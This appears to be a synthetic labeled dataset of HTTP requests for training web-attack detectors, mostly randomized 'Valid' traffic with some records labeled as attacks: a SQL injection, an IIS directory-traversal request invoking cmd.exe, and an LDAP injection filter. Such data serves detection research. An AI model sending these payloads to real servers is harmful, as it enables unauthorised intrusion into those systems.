If-Unmodified-Since: Thu, 03 Aug 06 12:18:42 UTC
If-Match: "rG89Pk5P.CgP56Ip"
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 9.9
Pragma: eitd='eetnlekf'
Proxy-Authorization: Digest realm
Authorization: NTLM ZWVvZ2F0bWdmc2V0bmVlc3NjaXJvc3NhcnByZWVhYXBzd3RudGF2aXljUmU4
Range: 26325-226828,6-
Referer: /wmwt/jqe7fee/zEpc/ecru3/hggyU2l8.asmx
TE: trailers,chunked;q=0.6
Trailer: Accept
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 7.6; ml-ai; rv:4.9.7) Gecko/11472102
UA-CPU: 68000
UA-Disp: 640,917,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8762x9260
Via: 3.3 www.dohwnm.html, 7.5 www.do5Env.htm, HTTP/5.7 48.6.146.97
Transfer-Encoding: compress
Upgrade: pT60yE/0.0, eKur/8.8, tebei2/3.1, ee1am/8.4
Warning: 150 www.dawin.css:2223 "eitisd8hsedi" "Sun, 06 Feb 05 24:39:20 GMT"
X-Forwarded-For: 88.145.158.81
X-Serial-Number: 74768030946395
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29294
Start - Id: 618
class: Valid
GET /hmAh-Xi8NZs.msf?lecpehpsaujole=hnn&ekn=hl1&ieoi=504444310 HTTP/1.1
Host: www.dae8uo.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dw-tmD;q=0.3, iwrlic9u-hbdlo3a;q=0.8, Iw-e, yoezojpo-hnLbri;q=0.9
Cache-Control: max-age=4969
Client-ip: 89.36.24.240
Cookie: tT=tbwncTd;aTTaOls=uiet3yaNdnnnolud;dz=7342479;OIGV=8933;ps=4;ieaex=13578574
Cookie2: $Version="15"
Date: Wed, 19 Dec 07 22:07:08 CET
ETag: "MI0nPVCyGL2S@fDb5aMc"
Expect: 100-continue
From: c8iae5ir@arholxtaey.fr
If-Modified-Since: Wed, 11 Apr 07 05:59:20 CET
If-Unmodified-Since: Thu, 01 May 08 08:56:10 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Mar 09 19:24:28 GMT
Max-Forwards: 3
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM U2VmcjBpbGVjc3Nlc2VydHdlcDcyYmlyRGVlcTNocmE2aQ==
Range: -824,94971-,-2841
Referer: /EP6ern/ocsds/2nitten.pdf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: yS.iOCw http://www.aettbl.st
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x961
Via: 5.5 132.54.238.57
Transfer-Encoding: tesEtr; aPitrm=yeyayjp
Upgrade: dog/2.3, ranys/6.1, ariu/3.6, aatroo/3.3, eb8/2.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 92.204.25.91
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 618
Start - Id: 5704
class: Valid
POST /eRuu/elTuidf7ltdeoynnzt/e1Tr/3WPKETMQYluO0/xmf4-Lpprocessing-instructionFY7yR/epbcilatyttrm5tprCr.css? HTTP/1.0
Content-Length: 50
Content-Language: 1h,rearrb,etaizo
Content-Encoding: deflate
Content-Location: /bEfn.dll
Content-MD5: dHlldXRlSWQ0ZHNzdWFwNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 May 08 17:20:24 CET
Last-Modified: Tue, 16 Jan 07 17:27:18 GMT
Host: 113.242.102.234
Connection: cent
Accept: */*;q=0.8
Accept-Charset: windows-1255, iso-8859-7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 1.110.220.47
Cookie: tNahbzeuAr=+ehn3s uhi;0rhfm9trettcsw=pe;Rotlms=4335460;7zformX@perluKyZm=5Ieep7;oums=3711620
Cookie2: $Version="819"
Date: Fri, 16 Feb 07 02:01:38 UTC
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: jdYeaesr@naae.de
If-Modified-Since: Mon, 30 Jun 08 16:05:56 UTC
If-Unmodified-Since: Mon, 31 Mar 08 01:29:19 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Sep 06 21:55:36 CET
Max-Forwards: 9437
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="EF4ECf02FCB0B3A3dBCfC57Ba47ABc57"
Authorization: aachtf avhue=bPeee
Range: -68253,802-
Referer: http://seutw.it/sises/rohleajs/9hhek.ace
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: h4rlmj http://www.wnmIaaoo.fr
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 327x1132
Via: 4.6 46.205.33.112, FTP/2.5 www.uuriec.gif
Transfer-Encoding: gzip
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 862 198.32.164.214 "elois" "Mon, 15 Jun 09 05:39:31 UTC"
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

FhttpNKlhpositionBlQ=atdduidriwp0&&tdrilt=fes og

End - Id: 5704
Start - Id: 41911
class: SqlInjection
GET /qetnRiTei/Ret0smjtvesAeqerwc/0eatfl/prhrs.php3?sol=ptw&toneb=%26satl&BfromGUm=84019&fLIijSf9=yel&iqntau2toe3=43791&sYitoe13svFra=acattf&5TusrLm=%26%25ne%7C0dsnmn6ieevalt%25+5%5C&lopnzjBarmp8d=tGAPt%40qyhx&rsd0gdi=wKirG&z2=183851&tnrsi1=0eee4wYyrpmrrq&dOmumccs6rogM=55584630&jdid=%27+AND++++USER_NAME%28%29%3D%27dito HTTP/1.0
Host: www.cdrb0ham.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.5, iso-8859-8, iso-8859-8;q=0.1
Accept-Encoding: compress, deflate;q=0.5, compress;q=0.1, gzip, gzip
Accept-Language: Ob7-tdst;q=0.8, T-9heenSml;q=0.7, sa5o-nmr, Ay-ii;q=0.9, ljas-iti
Cache-Control: only-if-cached
Client-ip: 234.95.167.71
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="2"
Date: Tue, 30 Sep 08 06:50:24 CET
ETag: W/"0EKNpBL.NFJRNzsO.eU"
Expect: reyI=leeee
From: whodpi@rrheriuA.net
If-Modified-Since: Fri, 12 Mar 04 08:30:43 UTC
If-Unmodified-Since: Mon, 04 Feb 08 19:05:56 CET
If-Match: "7k84Q-g8qC-HE-ARv"
If-None-Match: "t.FxVG.n7SP9q.4jm"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.7
Pragma: eoantyc='asuum7'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic ZW42bGEybzpzZnRhdQ==
Range: 301875-45,510153-7
Referer: http://oerbtoDx.biz/eg8oe/ceehIgbc/eOgoektc/yD5rnrd/4ho44lme.tar
TE: gzip
Trailer: Via
User-Agent: 4tsLaia3n
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: fUead; ttnb=jeOitlhf
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41911
Start - Id: 18750
class: Valid
GET /mjaheeOooanlOi/sOfsofrajTgc8/olHhm7e/ecqSV0systemdJj7.msf? HTTP/1.1
Host: www.nie6mnotm.fr
Connection: gngrioac
Accept: */*
Accept-Charset: windows-1257;q=0.4, hz-gb-2312;q=0.9, windows-1257
Accept-Encoding: identity
Accept-Language: rhe-cese8ni2, tuslr3ee-lc;q=0.0
Cache-Control: max-stale=2
Client-ip: 19.188.65.223
Cookie: 0BcnhvisvCnor=sae ceto4 ok;eslre=84046372;Arnull7=5;ojdnoeh6wvgteui=7odPiW@;ce1hnE5dibe8=742975;n0ioesiumT56r=pwCBCvnsQ
Cookie2: $Version="1"
Date: Thu, 29 May 08 15:23:32 GMT
ETag: "eMtpcpbh@B.vn9rAhj"
Expect: cyUsauwn=ypnTpah
From: envreer4@lEts7.gov
If-Modified-Since: Sat, 20 Aug 05 24:46:21 UTC
If-Unmodified-Since: Mon, 23 Aug 04 22:39:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3792
MIME-Version: 1.7
Pragma: alfeeit=ip2l
Proxy-Authorization: Digest algorithm=MD5
Authorization: S2hjN hETa=nbdtSe
Range: 43867-
Referer: /toenmc/spwenaa/oreN0b4/hxnd/dyrBut.htm
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: sdgweO/5.4.3
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: 8.6 0.227.18.242, 1.2 148.231.43.117
Transfer-Encoding: gzip
Upgrade: e7tu/5.3, HipE/9.9
Warning: 921 www.wRltoroI.gif "hibn" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18750
Start - Id: 30581
class: Valid
GET /vf9nt2WYRIh7/wBHEbTDrXmkMjv/r5Z/wwa/lwindow.openUcyg8.I4O/h_glz_IaNRlXGA-GT4.png?ssnwsoefn6=1&l8fefjalwz=o15Uyljm&hm1pwfjosenw=be%3Fmetansock_streamhplancet HTTP/1.0
Host: 164.189.83.118:80
Connection: bu7rdSac
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.7, windows-1257, shift_jis;q=0.8, euc-cn;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=25
Client-ip: 61.132.5.63
Cookie: Ferolwi=lnnJYeuJSWB;iMguSJcmdE_=tcF2enR5na8qnt1;4Ylib05hb=aFIlR@;elohe4nel=6494346
Cookie2: $Version="30"
Date: Wed, 18 May 05 06:21:22 UTC
ETag: W/"Zc9A6pDrlR_A1SV"
Expect: 100-continue
From: hmin@oar8.com
If-Modified-Since: Mon, 18 Feb 08 18:23:35 CET
If-Unmodified-Since: Sun, 22 Jan 06 20:59:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Sep 07 01:30:48 UTC
Max-Forwards: 3121
MIME-Version: 9.2
Pragma: raeM=wnln
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Basic aHJlYTpvZ2lobmVl
Range: -185
Referer: /xYTeoo3/tguuquh.pdf
TE: trailers,gzip;q=0.9
Trailer: Warning
User-Agent: rIhos1hemse
UA-CPU: 68000
UA-Disp: 8416,561,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: FTP/1.7 38.155.8.248
Transfer-Encoding: deflate
Upgrade: iicoun/9.2, tlnhD/8.4, i5ise/8.9
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 132.1.3.118
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30581
Start - Id: 44350
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.e0dxoripe.de
Connection: yOdsyhet
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 253.153.154.72
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Sat, 07 Aug 04 19:05:41 UTC
ETag: "RSp4zdzXB1AJ_l1"
Expect: ethDSte
From: oehrc@o8se.com
If-Modified-Since: Tue, 10 Nov 09 23:58:58 CET
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: *
If-None-Match: *
If-Range: "FxaYGHFY7PnQFZ4_"
Max-Forwards: 04
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest username="rneutiaD"
Range: -61939,-108
Referer: /mass/hbeT2trE/dmeac5e.sh
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.3; it-de; rv:5.7.5) Gecko/67030777
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44350
Start - Id: 14048
class: Valid
GET /nQiZ0fzsJ5v/wlelsEfoteoe6seBar0h/dZ2NiqvZVPj/I0NselectFgqimg8X08i/93reSio5la/imoke/IxO_uSJ8blAE52T/tr.jpg? HTTP/1.0
Host: 168.53.191.93
Connection: heuarhfs
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: ci-f, s1oh-smO5wtg, iooreh-niyeiqs;q=0.0, euAn3io-i6ueRek
Cache-Control: only-if-cached
Client-ip: 120.124.48.202
Cookie: YPFtIaZDoor=7389236637
Cookie2: $Version="0"
Date: Mon, 05 Jun 06 04:24:42 GMT
ETag: "oVDHGEif@LxUzuRnu5"
Expect: r4va=jt4odbaE
From: cenEc@hezob.fr
If-Modified-Since: Mon, 31 Oct 05 21:18:58 GMT
If-Unmodified-Since: Tue, 25 Jul 06 19:26:17 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 09
MIME-Version: 3.7
Pragma: 9r5ncixT='ntnrto'
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: naey08 nabvuduS=aatgykoo
Range: 477582-,-394214
Referer: http://www.s2hGAEv.st/Spta8m9t/2ault/Fllttduu/jeom/gHegdr2o.jpg
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: taose/2.7.9.3.4
UA-CPU: x86
UA-Disp: 091,777,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8443x481
Via: eehuo/6.2 www.eNtiuor.gif, HTTP/6.1 www.stw5fdn.tiff:2290, 5.8 45.152.128.74
Transfer-Encoding: compress
Upgrade: iQr/6.2
Warning: 826 60.35.56.208 "d0eihicmspnehASyl" "Tue, 15 Dec 09 11:56:23 GMT"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14048
Start - Id: 21472
class: Valid
GET /sal/6fZBdQm6FSoEz/lxe3u5UrD/xDSXeG/FVut9E3gENCOqhb/AK7/sgL6KtQUBz./sFt.aw8QImkI.css?leteoex=9840420351&lyontytt=%3Cuee&y8CZahsstehetD=jr08L4kyej&cbusUzlaotjtday=sxnb&trtn4Ds=15&ijaiu=homelocationmetaleeo&Pg=5ipre&at9igtle1fd=t+9mtjaE%5BNlE HTTP/1.1
Host: 220.68.254.89
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.6
Accept-Encoding: gzip, gzip;q=0.7, gzip, identity;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 8.200.88.162
Cookie: M@Vrdyb=698;ohDdcgfRo=8;ayattpeau=r odw encbTey;ovctofDl=g.nVU
Cookie2: $Version="702"
Date: Sat, 12 Aug 06 06:39:06 GMT
ETag: W/"Y.O-0uEW4tNzrNYwA"
Expect: 100-continue
From: eesn@eeanDbi.org
If-Modified-Since: Wed, 12 Oct 05 04:06:03 UTC
If-Unmodified-Since: Fri, 11 Sep 09 02:56:55 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Apr 08 14:37:52 CET
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aats 5Olh=ay0rd
Authorization: rikf oie4h=ewnnhq
Range: 78223-,397-29073
Referer: /zOemnnn/iuge2r/iMowmna/neM4aj/eAhrstmo.pl
TE: chunked;q=0.2
Trailer: From
User-Agent: oTeis9wtysaesnTocdll
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7753x3387
Via: HTTP/7.1 www.ekeyv6.html, 4.6 www.oTtehr0.jpeg, 5.9 www.ute1.jpeg
Transfer-Encoding: compress
Upgrade: apHe/6.7, debg/6.0
Warning: 201 215.143.70.57 "zvdhtEerqs" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 53165421880572
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21472
Start - Id: 5437
class: Valid
PUT /KTqRk-R/GlikeMq0xhttpsVMhVpC./dbu6I0wU@lwN54Zczz/hFA2z4t-pzQQ/POZ/aF4C1P/3MNgXKUgSHH.aspx? HTTP/1.1
Content-Length: 268
Content-Language: e
Content-Encoding: deflate
Content-Location: http://Odpuslu.com/iptp/44kr.nsf
Content-MD5: OXNlc0huc3NoaG10dGlidA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 May 09 09:19:27 UTC
Last-Modified: Thu, 10 Aug 06 19:22:54 UTC
Host: www.9brafrt.it:80
Connection: keep-alive
Accept: text/*;q=0.5, video/mpeg;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.5, compress;q=0.9, gzip;q=0.1
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 9.201.23.222
Cookie: 45a9EydaenB=549143
Cookie2: $Version="5"
Date: Mon, 31 May 04 18:39:47 UTC
ETag: "GdhQ7zVO5_wsjp1g"
Expect: tbt2=enhoqa
From: duemse@aiti.it
If-Modified-Since: Sun, 25 Dec 05 02:58:24 UTC
If-Unmodified-Since: Sun, 07 Oct 07 06:40:21 GMT
If-Match: "ercKWFyC73sZFhQ"
If-None-Match: "B2ny9vNxgSCb-eFQaEd"
If-Range: Thu, 07 Oct 04 15:30:57 CET
Max-Forwards: 72
MIME-Version: 8.8
Pragma: rehr='redi'
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: Digest nonce
Range: 84-,-306723
Referer: /ldo3u/3phitr2.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.7 (compatible; valS58ie; Linux i386; 3heiiihm; eruaiiron; jteF)
UA-CPU: MIPS
UA-Disp: 329,3885,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 375x4615
Via: FTP/8.0 www.ndmhsh.shtml, olt/2.1 44.25.126.225
Transfer-Encoding: compress
Upgrade: RahN/5.1, tLrem/6.4, ett/3.2, iub/6.4, gni/3.3
Warning: 029 www.tlotee.shtml "e3enowe" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Smeoe8y= em&sa0aeeloB=5;2selectrsaw&rUAChsP_U=rBnt&SarO95ueolss=00054206&Ekc=916462&hsdhaiehhU=nlule9t m&nsn4=tafa&cHo5sna=yQF2mjj&acnripibfy5X4he=nou'&rs=a8paaetetmNuoi&cfrOeTNeHa=oT$ruTr1Uimg&oSuaacsrotb=6194&t8tro=ok4t&5pnBHJw00F8=et]he&onoegh&e7o1lhgw=70

End - Id: 5437
Start - Id: 6042
class: Valid
POST /nsgColewmnn4Orint4/teOnpg/ietahu/vYLiORCnaZ5H@ooyXRV/Ag6q_lrpLJbgPGr/copyMmochaI/tPk/w-RMrAaa/j0P8jRfWnffZebzV.K/POG/cC8YdivzKXDvTim.jpeg? HTTP/1.1
Content-Length: 36
Content-Language: wa9m5wp,6zr3,D
Content-Encoding: deflate
Content-Location: /hbanedq8/f9AT5/regie/jqordier/eeuere.sh
Content-MD5: QWVvam5td21hU2phdWl0dg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Apr 06 16:57:32 CET
Last-Modified: Mon, 15 Mar 10 12:11:15 UTC
Host: www.eiouioees.net:069
Connection: tteetw
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip, gzip
Accept-Language: zjq-tNlrwwTe;q=0.0, a5aux-rE;q=0.1, m4WC-sffiye, t4-oov;q=0.2, imonih9e-RenirnRh
Cache-Control: no-cache
Client-ip: 28.235.71.35
Cookie: dn=IcehlDpaD;anvxgnnrow=cHueip1;XJtHTXu7wTzG=ds1T;ctoeRms2=oT-jrH;eaOertsonnonl2=plSlIfhcFtl
Cookie2: $Version="4"
Date: Sun, 25 Nov 07 12:24:37 UTC
ETag: "q3jKt1Az16o6EjZ3ol"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Sun, 23 Jul 06 23:37:13 GMT
If-Unmodified-Since: Sat, 27 Mar 04 23:08:30 GMT
If-Match: "TFuCuH6h_TM9Qxf"
If-None-Match: "MgJwm1Q.U4aL60IEno."
If-Range: Sun, 19 Sep 04 13:29:33 UTC
Max-Forwards: 397
MIME-Version: 3.9
Pragma: IWd=Iribs
Proxy-Authorization: Basic ZmhyZWNtOnJ0bmE=
Authorization: ea5O Xtbt=ntme
Range: 777-,35698-48172
Referer: /erRk/vlis/8E6Ttoog/ines/1lsnt.pdf
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: hPsrsaeetN/5.0
UA-CPU: x86
UA-Disp: 2677,507,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 986x885
Via: 1.5 172.128.141.42:8915, 2.5 79.62.114.91:37441, FTP/9.2 www.rteI.shtml
Transfer-Encoding: identity
Upgrade: ctdT90/6.6, ehttn/1.4, ath/2.3, rdties/0.0, wtnsiW/6.4
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 102.142.185.9
X-Serial-Number: 74978987947334907792
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

B_nodeG-rjtkQ=ia&yeec0fnsa0gin=18840

End - Id: 6042
Start - Id: 4481
class: Valid
PUT /oflvbk89l/7nsingoeTdm/tT0Bq23Qo2.jpg? HTTP/1.0
Content-Length: 69
Content-Language: i0,i92l
Content-Encoding: deflate
Content-Location: /gttd.exe
Content-MD5: ZHN1aXp6dGNvdFRhTmMyYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 21:50:15 CET
Last-Modified: Mon, 07 Dec 09 18:19:57 GMT
Host: 188.132.164.199
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: ee-o, swe-no, 3rtlryji-TElrhmmj;q=0.3, 7il-m;q=0.7
Cache-Control: only-if-cached
Client-ip: 49.184.212.207
Cookie: ABMlI9mochay1=l1lZ;8eoTltl2rh=ttjnwm;pX.t4RTDdo=hlsbaenlinrsoexs
Cookie2: $Version="357"
Date: Mon, 03 Mar 08 13:55:50 UTC
ETag: "T1Np.U00Gp9bgT5HkM7R"
Expect: 100-continue
From: eneiwbe@rqreia1soo.ch
If-Modified-Since: Tue, 17 Nov 09 11:48:41 UTC
If-Unmodified-Since: Thu, 15 Dec 05 16:59:46 UTC
If-Match: "B6b@nBTTQxuyN-Ddiy"
If-None-Match: "fwQaoNNuL__JNtO8"
If-Range: Wed, 08 Apr 09 09:47:20 GMT
Max-Forwards: 186
MIME-Version: 8.8
Pragma: iTqooi=a2iess
Proxy-Authorization: NTLM YzlzaWhpYWhUZmNudjRBdHMycmxzM2k5SGlhbHRtbmFldG1k
Authorization: tlThn ksird=yOcot
Range: 47-43864,-075,-7838
Referer: /rs3i.tiff
TE: chunked,gzip,chunked;q=0.7
Trailer: Accept
User-Agent: wown (ycFd0z.; iYadi7N; yn31zmKuK)
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 421x3151
Via: efae/8.0 www.aE2fqhtl.html:736
Transfer-Encoding: cS2ris; mEonHe=uusj
Upgrade: Moson/2.1, itmr/6.7, bncl/8.0, i5UEIM/3.2
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MQPmfu.includesWFq=ahTT&brcttTc=:zas<hp+Rts&3Qvbscriptss=679015

End - Id: 4481
Start - Id: 37696
class: LdapInjection
PUT /as8RA/iSTaMYKeGxZVLKO2P/leiaassletTl/cngoxb7qh5tseu/rrb/8deaertdsITr/es4fbts8esaa/s-2fMnt/htdvuhxYo/sDEuQG6K7B3QmL/ShdnnuoiKYt0etemi0r.js? HTTP/1.1
Content-Length: 110
Content-Language: nroa,rNNiot,n4b
Content-Encoding: gzip
Content-Location: /e0gTzH0/tlmigse/hacpezs.cfm
Content-MD5: b2QxZXNGZWlkZW9ub3hlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Fri, 30 Mar 07 02:02:36 CET
Host: www.oIsd.be
Connection: close
Accept: audio/*;q=0.6, text/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: g-0oewb8;q=0.1, tt7aAeh-erhnmn;q=0.5, 4jgtl-HttedEs;q=0.7, i-neeev, 6issu-m0ar6oL;q=0.7
Cache-Control: max-age=24
Client-ip: 240.130.115.181
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Sat, 29 Mar 08 08:53:33 UTC
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Sun, 11 Jan 09 01:35:42 GMT
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: "RYR8tqjummLZhkCufZD"
If-None-Match: *
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 3812
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: http://www.rdmby.be/iRmso4t.zip
TE: chunked,gzip;q=0.3,deflate
Trailer: Accept-Language
User-Agent: Mozilla/5.7 (compatible; Konqueror/6.0; Windows NT; gAartieo)
UA-CPU: MIPS
UA-Disp: 5884,733,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.2 112.123.85.248, mgwt/6.4 95.22.0.37, FTP/5.7 www.diyrcnt.tiff:6
Transfer-Encoding: identity
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

tri0lyjitag5=")(targetfilter=(o=NetscapeRoot))&jechgnovies2ni=uCuHl-C.aSJ&hs1hukabtgd4mRy=4557

End - Id: 37696
Start - Id: 10010
class: Valid
GET /tK/isuOhold2/eTeZfR/ue5e9/wr6OopenS@5WEPzform/ofv7ZZcXNo@Sp/3j/MZCVhZ/eLpOeolebis.mdb?rlm3tlrlzdeemDu=ts&ae=259&m0Zn=4TdFU8lX&scafa1ao=sTehnw+%3Dski&lhovconnect=qon&po=3ottXitr&a7ons=cxp_%27&6CehdZchildL=539&ie3po=726287&An1yalheAodo6n3=97rt%5Csoxe&hbIOIs=%5Clibi+%3Ajs1e9r41o&G3Amtl=dntleorsQvtd&mi5hweO=s%3BeHordrop%5DWlm%5Ca&doierHieTiCa3s=ofrl98Ntsbietnal&nendha=e%24e HTTP/1.0
Host: www.rrX7eiusis.ch
Connection: vYfia
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.9, isiri-3342
Accept-Encoding: gzip, gzip, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 102.147.145.53
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="94"
Date: Fri, 26 Nov 04 02:48:58 CET
ETag: "37Du@YuAnBeW63f@"
Expect: sE9tIn
From: 2rbOee@urmb.de
If-Modified-Since: Wed, 15 Nov 06 13:37:24 GMT
If-Unmodified-Since: Fri, 29 Jan 10 03:30:23 GMT
If-Match: "_atucQgMH@H0dlST"
